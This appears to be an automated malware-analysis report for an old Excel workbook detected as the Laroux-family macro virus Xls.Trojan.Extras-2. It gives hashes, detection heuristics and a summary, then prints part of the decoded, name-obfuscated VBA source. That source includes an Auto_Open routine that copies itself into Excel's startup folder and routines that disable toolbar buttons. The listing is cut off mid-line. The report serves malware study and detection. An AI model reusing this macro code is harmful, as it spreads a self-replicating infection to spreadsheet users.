Xls.Trojan.Extras-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 c285f294573a6cf8…

MALICIOUS

Office (OLE)

Size: 73.0 KB
Created: 1998-10-15 09:28:17
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: 7ca11c8d52c91e731e95b5756620081e
SHA-1: 27a82d370f37aeb9bcffa8184a4824208234dcc6
SHA-256: c285f294573a6cf8c6f6ca6cb343bcea376e002b2d2d96f7cfbc25c50671bf42
Risk Score: 280

Malware Insights

Xls.Trojan.Extras-2 · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The file is identified as a malicious Excel 5 macro virus (Laroux) by multiple heuristics, including critical ClamAV detections. The VBA macros contain Auto_Open and Auto_Close subroutines, and one subroutine attempts to disable the print button and save a new workbook, indicating a potential attempt to prepare the system for further compromise or to evade detection. The presence of Auto_Open and Auto_Close macros strongly suggests it was delivered as a spearphishing attachment.

Heuristics 5

  • ClamAV: Xls.Trojan.Extras-2 · critical · CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Extras-2
  • Excel 5 Laroux/Larou-CV macro-virus marker cluster · critical · OLE_XLS5_LAROUX_MACRO_VIRUS
    Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
  • VBA macros detected · medium · 2 related findings · OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro · high · OLE_VBA_AUTO
    Auto_Open macro
  • Auto_Close macro · high · OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 30384 bytes
SHA-256: 20b512594b9704eb01e38640b5702707d803ff36decedd84aa846abe4d69109a
Detection: ClamAV: Xls.Trojan.Extras-2
Obfuscation or payload: unlikely

Preview script

First 1,000 lines of the extracted script
Attribute VB_Name = "vzsevihUUP8r9VLOxJTfWQHc0"





Option Explicit
Private Sub hmhhmrnhnnrhmhhnnmmnnrhnnmhhnn()
Dim mmnhrrrhhhnnrnmrnnhnnhmrmmnhrh As Integer
Randomize
mmnhrrrhhhnnrnmrnnhnnhmrmmnhrh = Int((4 - 1 + 1) * Rnd + 1)
Call rnnhnrnnrnmrnhnnhmhrhmrrhnrnmh
Select Case mmnhrrrhhhnnrnmrnnhnnhmrmmnhrh
Case 1
Call rnmhhhnnnhmnnnrhhhhnhhhnrhmmhr
Case 2
Call mnhrnnhhhhrnmnmnmhrhrhhmmhhhmn
Case 3
Call nnmhrhmhrnrmmrhnrmhmnhmmnnmnrh
Case 4
Call nmhrrhmmhhrrmhhnmmnmmnnnhmnrmn
End Select
End Sub
Private Sub nnmrhnmmrnrhhmhnrhhmmmhhhmnrmr(ByVal hnhhnnnrrrnnnmnnnnnnnrmnhmhrnr As String, ByVal rrhnmhrnhhnmnhhhhnhrnmmhnrmnhm As String)
Application.ScreenUpdating = False
Dim mhnrrrnnnhnmmmhrnhnrhmhhhmhhnn, mrnhnhnnrrmmrmnhrnrrmmnmrmnnmn As String
Workbooks.Add
ThisWorkbook.Sheets(1).Visible = True
ThisWorkbook.Sheets(1).Copy before:=ActiveWorkbook.Sheets(1)
With ActiveSheet
.Name = mnhrnnhmhrrrhrhmrnmnmmhhmrmmmn(-5 + 6 * 5)
.Visible = False
End With
mhnrrrnnnhnmmmhrnhnrhmhhhmhhnn = ActiveWorkbook.Name
mrnhnhnnrrmmrmnhrnrrmmnmrmnnmn = CurDir()
ChDir Application.StartupPath
ActiveWindow.Visible = False
Workbooks(mhnrrrnnnhnmmmhrnhnrhmhhhmhhnn).SaveAs FileName:=hnhhnnnrrrnnnmnnnnnnnrmnhmhrnr & rrhnmhrnhhnmnhhhhnhrnmmhnrmnhm, FileFormat:=xlNormal
ChDir mrnhnhnnrrmmrmnhrnrrmmnmrmnnmn
ThisWorkbook.Sheets(1).Visible = False
Application.ScreenUpdating = True
End Sub
Private Sub rnmhhhnnnhmnnnrhhhhnhhhnrhmmhr()
Dim hnmnhhrhmhrrnmmnrrnnhmmrnnrnmh As Variant
For Each hnmnhhrhmhrrnmmnrrnnhmmrnnrnmh In Application.Toolbars("Standard").ToolbarButtons
If hnmnhhrhmhrrnmmnrrnnhmmrnnrnmh.Name = "Print" Then hnmnhhrhmhrrnmmnrrnnhmmrnnrnmh.Enabled = False
Next
End Sub
Private Sub nmhrrhmmhhrrmhhnmmnmmnnnhmnrmn()
Dim hnmnhhrhmhrrnmmnrrnnhmmrnnrnmh As Variant
For Each hnmnhhrhmhrrnmmnrrnnhmmrnnrnmh In Application.Toolbars("Standard").ToolbarButtons
If hnmnhhrhmhrrnmmnrrnnhmmrnnrnmh.Name = "Save" Then hnmnhhrhmhrrnmmnrrnnhmmrnnrnmh.Enabled = False
Next
End Sub
Private Sub nnmhrhmhrnrmmrhnrmhmnhmmnnmnrh()
Dim hnmnhhrhmhrrnmmnrrnnhmmrnnrnmh As Variant
For Each hnmnhhrhmhrrnmmnrrnnhmmrnnrnmh In Application.Toolbars("Standard").ToolbarButtons
If hnmnhhrhmhrrnmmnrrnnhmmrnnrnmh.Name = "Open" Then hnmnhhrhmhrrnmmnrrnnhmmrnnrnmh.Enabled = False
Next
End Sub
Sub Auto_Help()
Attribute Auto_Help.VB_ProcData.VB_Invoke_Func = " \n14"
Randomize
With Application
.SheetsInNewWorkbook = Int((255 - 1 + 1) * Rnd + 1)
.Help
End With
End Sub
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
Dim rrnmhnnrrmnmmhmmrhhhmhrhnmnrrr, rhhnmhhnrrnrrrrhrmnmmnnrrnhrhr, nrrhmhnnrhrrrrmrmrhnrrmmmrnhhm As String
Dim mhhmmnrmmhnhhhhnrmrnnrnhhmnmnh As Boolean
Dim hrnnmnnnrhrnrrrnnhhmnnrnmrnmhn As Variant
nrrhmhnnrhrrrrmrmrhnrrmmmrnhhm = "EXTRAS.XLS"
If Left(Application.OperatingSystem, 3) = "Mac" Then
nrrhmhnnrhrrrrmrmrhnrrmmmrnhhm = "Macintosh Extras"
ElseIf Left(Application.OperatingSystem, 10) <> "Windows 3." Then
nrrhmhnnrhrrrrmrmrhnrrmmmrnhhm = "Windows Extras.xls"
End If
rhhnmhhnrrnrrrrhrmnmmnnrrnhrhr = Application.StartupPath & Application.PathSeparator
rrnmhnnrrmnmmhmmrhhhmhrhnmnrrr = Dir(rhhnmhhnrrnrrrrhrmnmmnnrrnhrhr & nrrhmhnnrhrrrrmrmrhnrrmmmrnhhm)
If rrnmhnnrrmnmmhmmrhhhmhrhnmnrrr = "" Then
nnmrhnmmrnrhhmhnrhhmmmhhhmnrmr rhhnmhhnrrnrrrrhrmnmmnnrrnhrhr, nrrhmhnnrhrrrrmrmrhnrrmmmrnhhm
Else
mhhmmnrmmhnhhhhnrmrnnrnhhmnmnh = False
For Each hrnnmnnnrhrnrrrnnhhmnnrnmrnmhn In Application.Workbooks
If hrnnmnnnrhrnrrrnnhhmnnrnmrnmhn.Name = nrrhmhnnrhrrrrmrmrhnrrmmmrnhhm Then
mhhmmnrmmhnhhhhnrmrnnrnhhmnmnh = True
Exit For
End If
Next
If mhhmmnrmmhnhhhhnrmrnnrnhhmnmnh = False Then
Application.ScreenUpdating = False
Workbooks.Open FileName:=(rhhnmhhnrrnrrrrhrmnmmnnrrnhrhr & nrrhmhnnrhrrrrmrmrhnrrmmmrnhhm), IgnoreReadOnlyRecommended:=True
End If
If Workbooks(nrrhmhnnrhrrrrmrmrhnrrmmmrnhhm).Modules.Count = 0 Then
Application.ScreenUpdating = False
Workbooks(nrrhmhnnrhrrrrmrmrhnrrmmmrnhhm).Close savechanges:=False
On Error GoTo hrmhrnnmmhhnrhrrrmmmmmhmmmhmmr
Kill (rhhnm
... (truncated)